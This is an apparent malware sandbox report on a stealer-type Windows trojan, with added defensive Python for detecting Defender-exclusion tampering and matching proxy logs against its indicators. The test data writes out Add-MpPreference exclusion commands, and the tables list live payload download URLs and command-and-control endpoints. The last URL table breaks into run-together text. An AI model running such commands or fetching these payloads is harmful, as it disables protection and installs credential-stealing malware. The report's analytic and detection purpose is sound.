Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (6 consecutive identical entries)
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_00431442 GetUserNameA, | 15_2_00431442
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (one line per tactic, techniques in the report's row order; a number in parentheses is the count the report shows next to a technique matched by this sample)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (31); Process Injection (11); Obfuscated Files or Information (3); Software Packing (1); Timestomp (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1579768   Sample: YYjRtxS70h.exe   Start date: 23/12/2024   Architecture: WINDOWS   Score: 84

Text rendering of the graph. Numbers in parentheses after a process name are the graph's per-process counters (see the legend); a network entry reads host, IP, destination port, source port(s), AS name, country.

start
 |- DNS/IP: t.me; steamcommunity.com; 2 other IPs or domains
 |- signatures: Multi AV Scanner detection for submitted file; Machine Learning detection for sample; PE file has a writeable .text section; 2 other signatures
 '- started: YYjRtxS70h.exe (15, 7)
     |- DNS/IP: github.com, 20.233.83.145, 443, 49772, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
     |- DNS/IP: raw.githubusercontent.com, 185.199.109.133, 443, 49778, FASTLYUS, Netherlands
     |- dropped: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (PE32)
     |- dropped: C:\Users\user\AppData\...\YYjRtxS70h.exe.log (CSV)
     |- signature: Adds a directory exclusion to Windows Defender
     |- started: powershell.exe (7)
     |    |- signature: Adds a directory exclusion to Windows Defender
     |    |- started: powershell.exe (23)
     |    '- started: conhost.exe
     |- started: powershell.exe (7)
     |    |- started: powershell.exe (22)
     |    '- started: conhost.exe
     |- started: powershell.exe (7)
     |    |- started: powershell.exe (23)
     |    |    '- signature: Loading BitLocker PowerShell Module
     |    '- started: conhost.exe
     '- started: 2 other processes
          |- DNS/IP: 37.27.43.98, 443, 49801, 49880, UNINETAZ, Iran (Islamic Republic of)
          |- DNS/IP: t.me, 149.154.167.99, 443, 49789, 49869, TELEGRAMRU, United Kingdom
          |- DNS/IP: steamcommunity.com, 104.102.49.254, 443, 49795, 49874, AKAMAI-ASUS, United States
          '- signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
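The behavior graph above shows the sample spawning powershell.exe three times, the sample and the first of those PowerShell processes being flagged for adding a Windows Defender directory exclusion, and each PowerShell process in turn starting a further powershell.exe and a conhost.exe. What follows is an added example of triaging that pattern in process-creation telemetry; it is not code from the report or from the sample. It assumes the exclusion is registered with the standard cmdlet, Add-MpPreference -ExclusionPath, possibly hidden behind -EncodedCommand, and that the excluded directory is the drop directory C:\spxzLeEJs seen in the dropped-file path; the report states neither. The event records, PIDs and command lines are constructed to mirror the tree in the graph.

```python
"""Triage Windows Defender exclusion tampering in process-creation events.

Added example, not code from the Joe Sandbox report or the sample. Assumed,
not stated by the report: the exclusion is set with Add-MpPreference
-ExclusionPath (optionally via -EncodedCommand) and targets C:\\spxzLeEJs.
All events below are constructed.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path of the new process
    cmdline: str


# Add-MpPreference / Set-MpPreference followed by any exclusion parameter.
EXCLUSION_RE = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+(?P<value>\S+)",
    re.IGNORECASE | re.DOTALL,
)
# -EncodedCommand and the unambiguous prefixes powershell.exe accepts for it.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the script passed via -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(events, pid):
    """Image basenames from the process up to the root, for analyst context."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image.rsplit("\\", 1)[-1])
        pid = by_pid[pid].ppid
    return chain


def find_exclusion_changes(events):
    """One finding per PowerShell process that registers a Defender exclusion."""
    findings = []
    for ev in events:
        if not ev.image.lower().endswith("powershell.exe"):
            continue
        decoded = decode_encoded_command(ev.cmdline)
        m = EXCLUSION_RE.search(decoded if decoded is not None else ev.cmdline)
        if not m:
            continue
        findings.append({
            "pid": ev.pid,
            "exclusion": m.group("value").strip("'\";"),
            "encoded": decoded is not None,
            "ancestry": ancestry(events, ev.pid),
        })
    return findings


def _encode(script: str) -> str:
    """Base64 of UTF-16LE, the form powershell.exe expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry: PIDs are invented, the tree follows the report's graph.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Users\user\Desktop\YYjRtxS70h.exe", r"C:\Users\user\Desktop\YYjRtxS70h.exe"),
    ProcEvent(1100, 1000, PS, "powershell.exe -NoProfile -enc "
              + _encode("Add-MpPreference -ExclusionPath 'C:\\spxzLeEJs'")),
    ProcEvent(1101, 1100, r"C:\Windows\System32\conhost.exe", "conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(1102, 1100, PS, "powershell.exe -Command Add-MpPreference -ExclusionPath C:\\spxzLeEJs"),
    # Benign control: a read-only query from an interactive shell.
    ProcEvent(2000, 900, PS, "powershell.exe -ep bypass -Command Get-MpPreference"),
]

if __name__ == "__main__":
    for f in find_exclusion_changes(SAMPLE_EVENTS):
        print(f)
```

The ancestry list is what turns a noisy rule into a useful one: an exclusion added by a PowerShell whose parent is an unsigned binary in a user profile, as here, deserves a different severity than one added from a management tool, so the finding carries the parent chain rather than deciding on its own.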

Source | Detection | Scanner | Label | Link
YYjRtxS70h.exe | 62% | Virustotal | | Browse
YYjRtxS70h.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Stealerc |
YYjRtxS70h.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | 100% | Joe Sandbox ML | |
C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | 63% | ReversingLabs | Win32.Trojan.Vigorf |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | | high
github.com | 20.233.83.145 | true | false | | high
raw.githubusercontent.com | 185.199.109.133 | true | false | | high
t.me | 149.154.167.99 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe | false | | high
https://steamcommunity.com/profiles/76561199804377619 | false | | high
https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe | false | | high
https://t.me/m3wm0w | false | | high
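The domain and URL tables rate github.com, raw.githubusercontent.com, steamcommunity.com and t.me as high reputation and not malicious. That is correct for the hosts and says nothing about the resources the sample used: the two GitHub URLs point at an executable, jtkhikadjthsad.exe, and the behavior graph shows the dropper contacting those two hosts and writing e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe to disk; the dropped payload then fetched the Steam profile 76561199804377619 and t.me/m3wm0w and contacted 37.27.43.98 directly. The indicators are therefore the exact paths on the shared hosts and the bare IP, not the hosts. The following added example (not code from the report) applies that distinction to constructed proxy log lines: exact-path matching on the shared hosts, host-level matching for 37.27.43.98, and a separate "shared-host" verdict that is deliberately not an alert. Indicator values are taken from this page; the log format, client addresses and timestamps are invented.

```python
"""Match proxy telemetry against this report's network indicators.

Added example, not code from the report. Indicator values are the ones
listed on this page; the log lines, clients and timestamps are constructed.
"""
from urllib.parse import urlsplit

# Exact resources the sample used on otherwise legitimate hosts.
IOC_URLS = {
    "github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe",
    "raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe",
    "steamcommunity.com/profiles/76561199804377619",
    "t.me/m3wm0w",
}
# Hosts that are indicators on their own (any path, any method).
IOC_HOSTS = {"37.27.43.98"}
# Shared infrastructure: contact with the host alone proves nothing.
SHARED_HOSTS = {"github.com", "raw.githubusercontent.com", "steamcommunity.com", "t.me"}


def normalise(url: str) -> str:
    """'host/path' with scheme, port, query and fragment dropped and no trailing slash."""
    parts = urlsplit(url if "://" in url else "https://" + url)
    host = (parts.hostname or "").lower()
    return host + parts.path.rstrip("/")


def classify(url: str) -> str:
    """Return 'ioc-host', 'ioc-url', 'shared-host' or 'none'."""
    key = normalise(url)
    host = key.split("/", 1)[0]
    if host in IOC_HOSTS:
        return "ioc-host"
    # Exact match, or a sub-resource of an indicator path (e.g. the profile's /badges page).
    if key in IOC_URLS or any(key.startswith(u + "/") for u in IOC_URLS):
        return "ioc-url"
    if host in SHARED_HOSTS:
        return "shared-host"
    return "none"


# Constructed proxy log: time, client, method, URL, status.
SAMPLE_LOG = """\
2024-12-23T10:01:02Z 10.0.0.5 GET https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe 302
2024-12-23T10:01:02Z 10.0.0.5 GET https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe 200
2024-12-23T10:01:09Z 10.0.0.5 GET https://steamcommunity.com/profiles/76561199804377619 200
2024-12-23T10:01:10Z 10.0.0.5 GET https://t.me/m3wm0w 200
2024-12-23T10:01:12Z 10.0.0.5 POST https://37.27.43.98/ 200
2024-12-23T10:05:00Z 10.0.0.7 GET https://github.com/python/cpython/releases 200
2024-12-23T10:05:01Z 10.0.0.7 GET https://t.me/durov 200
"""


def scan_log(text: str):
    """Return (client, url, verdict) for each line whose URL is an indicator."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[3]
        verdict = classify(url)
        if verdict in ("ioc-url", "ioc-host"):
            hits.append((client, url, verdict))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

Run against the constructed log, only the 10.0.0.5 lines come back; the unrelated GitHub and Telegram requests from 10.0.0.7 are classified "shared-host" and left alone, which is the behaviour a host-only blocklist built from the domain table would get wrong in both directions.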
URLs recovered from memory dumps and dropped files. Source names the process (by analysis process number) or dropped file the string came from; for a process, the number of memory dumps containing the string is given instead of the individual dump identifiers.

Name | Source | Malicious | Antivirus Detection | Reputation
https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&amp;l=english&am | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://player.vimeo.com | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 9 dumps) | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&amp;l=engli | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
http://crl.microsoft | powershell.exe (process 4; 1 dump) | false | | high
https://steamcommunity.com/?subsection=broadcasts | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 13 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://37.27.43.98/R | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 1 dump) | false | | unknown
https://cdn.cloudflare.steamstatic | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 1 dump) | false | | unknown
https://community.cloudflare.steamstatic.com/public/css/applications/community/main. | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 1 dump) | false | | high
https://37.27.43.98/j | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 3 dumps) | false | | unknown
https://store.steampowered.com/subscriber_agreement/ | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 13 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://www.gstatic.cn/recaptcha/ | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 6 dumps) | false | | high
https://37.27.43.98/k | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 1 dump) | false | | unknown
https://telegram.org/img/t_logo_2x.png | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 1 dump) | false | | high
http://www.valvesoftware.com/legal.htm | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 13 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://www.youtube.com | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 9 dumps) | false | | high
https://www.google.com | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 9 dumps) | false | | high
https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0 | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.dr | false | | high
https://aka.ms/pscore6lB | powershell.exe (processes 2, 4, 9, 11, 12, 14; 9 dumps) | false | | high
https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=engl | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://steamcommunity.com/profiles/76561199804377619/badges | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://t.me/ows | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 1 dump) | false | | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe (processes 4, 11, 14; 3 dumps) | false | | high
https://help.steamp | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 1 dump) | false | | unknown
https://s.ytimg.com; | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps) | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | YYjRtxS70h.exe (process 0; 1 dump); powershell.exe (processes 2, 4, 9, 11, 12, 14; 6 dumps) | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps); 76561199804377619[1].htm.15.dr; 76561199804377619[1].htm0.15.dr | false | | high
https://t.me/m3wm0wl | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 1 dump) | false | | high
https://steam.tv/ | e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe (process 15; 10 dumps) | false | | high
https://37.27.43.98 | 76561199804377619[1].htm0.15.dr | false | |
                                                                                  unknown
                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F7656119980437761976561199804377619[1].htm0.15.drfalse
                                                                                    high
                                                                                    https://t.me/m3wm0w8e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2021300435.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005356000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.00000000051A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://steamcommunity.com/profiles/76561199804377619C:e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://store.steampowered.com/privacy_agreement/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                high
                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=_92Te770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                  high
                                                                                                  http://store.ste770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://contoso.com/Iconpowershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://store.steampowered.com/points/shop/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                        high
                                                                                                        https://steamcommunity.com/profiles/76561199804377619.com/profiles/76561199804377619e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://steamcommunity.com/ce770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
